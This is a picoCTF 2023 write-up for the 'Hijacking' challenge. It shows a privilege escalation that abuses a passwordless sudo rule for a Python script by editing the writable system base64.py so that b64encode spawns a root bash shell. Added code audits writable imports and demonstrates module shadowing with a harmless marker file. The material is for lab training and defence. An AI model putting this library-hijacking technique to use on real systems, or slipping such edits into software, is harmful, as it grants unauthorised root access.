Hijacking PicoCTF 2023

200 points

AUTHOR: THEONESTE BYAGUTANGAZA

Description: Getting root access can allow you to read the flag. Luckily there is a Python file that you might like to play with. Through social engineering, we've got the credentials to use on the server. SSH is running on the server.

Note: This challenge launches an instance on demand.


This challenge was solved by Kubana on my team.

So, googling for Linux privilege escalation using Python, I found an article that walks through exactly this technique (except the shell-spawning part, which I took from a YouTube video).

Connecting to the server, I checked what I can run with sudo using sudo -l and got:

User picoctf may run the following commands on challenge:
    (ALL) /usr/bin/vi
    (root) NOPASSWD: /usr/bin/python3 /home/picoctf/.server.py

Cool, we can run the script as root with sudo, and without a password.

Now, inside the script there is an import of base64. Whatever that module does happens with the script's privileges, so we can hijack a function the script calls from that library.

Stripped down to what matters, the script does this (I reduced it to just these calls):

import base64

hi = "hi"
# the script passes its data through base64.b64encode; that is the hook we need
out = base64.b64encode(hi.encode('utf-8')).decode('utf-8')

print(out)

We need to hijack the function b64encode specifically, because that is the one the script calls; since the script runs as root, any code we put into b64encode runs as root too. We can do so by editing the original library file base64.py.

The file was located at /usr/lib/python3.8/base64.py, so I could open it in vim and edit it. (Before editing, it is worth checking with ls -l that the file is writable by the current user, and with python3 -c 'import base64; print(base64.__file__)' that this is the copy the script will actually load.)
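The checks above (what the script imports, where each module is loaded from, and whether that file is writable) can be scripted. The following is an added audit helper, not code from the challenge or the writeup; the target script is a constructed stand-in with the same imports, the default path /home/picoctf/.server.py is taken from the sudo rule, and the is_writable predicate is injectable so the logic can be tested without real file permissions. It also reports a related general case: because python3 /path/to/script.py puts /path/to first on sys.path, a writable script directory lets a same-named module shadow the real one.

```python
import ast
import importlib.util
import os
import sys
from typing import Callable, List, Optional, Tuple

# Constructed stand-in for the target script; the real .server.py is not
# reproduced here.  Only its import lines matter for the audit.
SAMPLE_SCRIPT = """\
import base64
import json as j
from os import path
from typing import List

hi = "hi"
print(base64.b64encode(hi.encode("utf-8")).decode("utf-8"))
"""

Finding = Tuple[str, str, str]  # (module, path, why it is attackable)


def imported_modules(source: str) -> List[str]:
    """Top-level module names a script imports (absolute imports only)."""
    names = set()
    for node in ast.walk(ast.parse(source)):
        if isinstance(node, ast.Import):
            for alias in node.names:
                names.add(alias.name.split(".")[0])
        elif isinstance(node, ast.ImportFrom) and node.module and node.level == 0:
            names.add(node.module.split(".")[0])
    return sorted(names)


def module_file(name: str) -> Optional[str]:
    """File Python would load for `name`, or None for built-in/frozen modules,
    which live inside the interpreter and can be neither edited nor shadowed."""
    spec = importlib.util.find_spec(name)
    if spec is None or not spec.has_location or not spec.origin:
        return None
    return spec.origin


def writable_import_targets(
    source: str,
    script_path: str,
    is_writable: Callable[[str], bool] = lambda p: os.access(p, os.W_OK),
) -> List[Finding]:
    """Report every import of `source` that the current user could turn into
    code running with the script's privileges.  `is_writable` defaults to
    asking the OS; tests inject a predicate instead."""
    findings: List[Finding] = []
    script_dir = os.path.dirname(os.path.abspath(script_path))
    for name in imported_modules(source):
        path = module_file(name)
        if path is None:
            continue
        if is_writable(path):
            findings.append((name, path, "module file is writable"))
        elif is_writable(os.path.dirname(path)):
            findings.append((name, path, "module directory is writable (file can be replaced)"))
        # `python3 /path/to/script.py` puts /path/to first on sys.path (unless
        # PYTHONSAFEPATH / -P is set, 3.11+), so a same-named .py there wins.
        if is_writable(script_dir):
            findings.append((name, os.path.join(script_dir, name + ".py"),
                             "script directory is writable (shadow module)"))
    return findings


if __name__ == "__main__":
    # Assumed default: the script path from the sudo rule in the writeup.
    target = sys.argv[1] if len(sys.argv) > 1 else "/home/picoctf/.server.py"
    try:
        with open(target) as fh:
            src = fh.read()
    except OSError:
        src = SAMPLE_SCRIPT  # fall back to the constructed sample
    for mod, path, why in writable_import_targets(src, target):
        print(f"{mod:10} {why}: {path}")
```

Run it as the low-privileged user against the script named in the sudo rule; every line it prints is a module whose code will execute as root the next time the rule is used.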

I imported pty at the top of the module and, at the start of the function b64encode (right after its docstring), added the line:

import pty  # added at the top of base64.py

def b64encode(s, altchars=None):
    """Encode the bytes-like object s using Base64 and return a bytes object.

    Optional altchars should be a byte string of length 2 which specifies an
    alternative alphabet for the '+' and '/' characters.  This allows an
    application to e.g. generate url or filesystem safe Base64 strings.
    """
    # runs as whoever called b64encode; blocks until the shell exits,
    # then the original encoding code below continues as normal
    pty.spawn('/bin/bash')

    #code...

Finally, running the file with sudo /usr/bin/python3 /home/picoctf/.server.py got me a root shell!
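To see the hijack work end to end without touching the system library, here is an added demonstration (not code from the challenge or the writeup). It copies the interpreter's own base64.py next to a constructed victim script, applies the same edit the writeup made (a line inserted after the docstring of b64encode), and runs the victim with a fresh interpreter; the script directory comes first on sys.path, so the patched copy is loaded. The pty.spawn('/bin/bash') payload is swapped for a marker-file write so the effect is observable non-interactively; the file names and directory are assumptions.

```python
import base64 as _real_base64
import os
import shutil
import subprocess
import sys
import tempfile


def patch_b64encode(source: str, payload_line: str) -> str:
    """Insert `payload_line` as the first statement of b64encode, right after
    its docstring, the same spot the writeup used for pty.spawn('/bin/bash')."""
    lines = source.splitlines(keepends=True)
    for i, line in enumerate(lines):
        if not line.startswith("def b64encode("):
            continue
        j = i + 1
        if lines[j].lstrip().startswith('"""'):
            # skip a one-line or multi-line docstring
            if lines[j].strip().count('"""') < 2:
                j += 1
                while '"""' not in lines[j]:
                    j += 1
            j += 1
        lines.insert(j, "    " + payload_line + "\n")
        return "".join(lines)
    raise ValueError("def b64encode( not found in source")


def demo_hijack() -> dict:
    """Copy the real base64.py next to a victim script, patch it, run the
    victim in a fresh interpreter and report what happened."""
    workdir = tempfile.mkdtemp(prefix="hijack-demo-")  # assumed scratch dir
    try:
        marker = os.path.join(workdir, "ran-as-victim")
        # Stand-in payload: the writeup spawned a shell; here we only leave a
        # marker file so the run stays non-interactive.
        payload = f'__import__("pathlib").Path({marker!r}).write_text("hijacked")'
        with open(_real_base64.__file__) as fh:
            patched = patch_b64encode(fh.read(), payload)
        with open(os.path.join(workdir, "base64.py"), "w") as fh:
            fh.write(patched)
        # Constructed victim, same shape as the challenge script.
        victim = os.path.join(workdir, "server.py")
        with open(victim, "w") as fh:
            fh.write("import base64\n"
                     "print(base64.__file__)\n"
                     'print(base64.b64encode(b"hi").decode())\n')
        # `python3 <script>` puts the script's directory first on sys.path, so
        # the patched copy is found before the stdlib one.  PYTHONSAFEPATH
        # (3.11+) disables exactly that, so make sure it is not set.
        env = {k: v for k, v in os.environ.items() if k != "PYTHONSAFEPATH"}
        proc = subprocess.run([sys.executable, victim], capture_output=True,
                              text=True, env=env, check=True)
        loaded_from, encoded = proc.stdout.splitlines()[:2]
        return {
            "loaded_from": loaded_from.strip(),
            "encoded": encoded.strip(),
            "hijacked": os.path.exists(marker),
        }
    finally:
        shutil.rmtree(workdir, ignore_errors=True)


if __name__ == "__main__":
    print(demo_hijack())
```

The victim still gets the correct encoding back, which is why this kind of tampering is easy to miss: the script keeps working while the inserted line runs first with the caller's privileges.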

Going into the /challenge directory and catting the flag file gives the flag:

picoCTF{your flag}
